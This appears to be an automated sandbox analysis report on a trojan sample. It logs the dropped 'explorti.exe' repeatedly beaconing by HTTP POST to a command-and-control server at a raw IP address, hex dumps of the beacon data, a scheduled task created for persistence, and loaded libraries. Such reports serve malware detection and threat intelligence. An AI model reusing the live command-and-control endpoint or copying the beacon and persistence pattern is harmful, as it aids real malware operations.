Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E2BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 2_2_00E2BD60
Source: unknown HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000002.00000002.3856846494.0000000001372000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php1z&V
Source: explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php9
Source: explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php:
Source: explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpM
Source: explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpW
Source: explorti.exe, 00000002.00000002.3856846494.000000000133E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpheCounterMutex8
Source: explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpl
Source: explorti.exe, 00000002.00000002.3856846494.000000000133E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpv

System Summary

Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: .idata
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File created: C:\Windows\Tasks\explorti.job
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: Section: ZLIB complexity 0.99981856215847
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: Section: eqezoorp ZLIB complexity 0.994464981179189
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 0.99981856215847
Source: explorti.exe.0.dr Static PE information: Section: eqezoorp ZLIB complexity 0.994464981179189
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
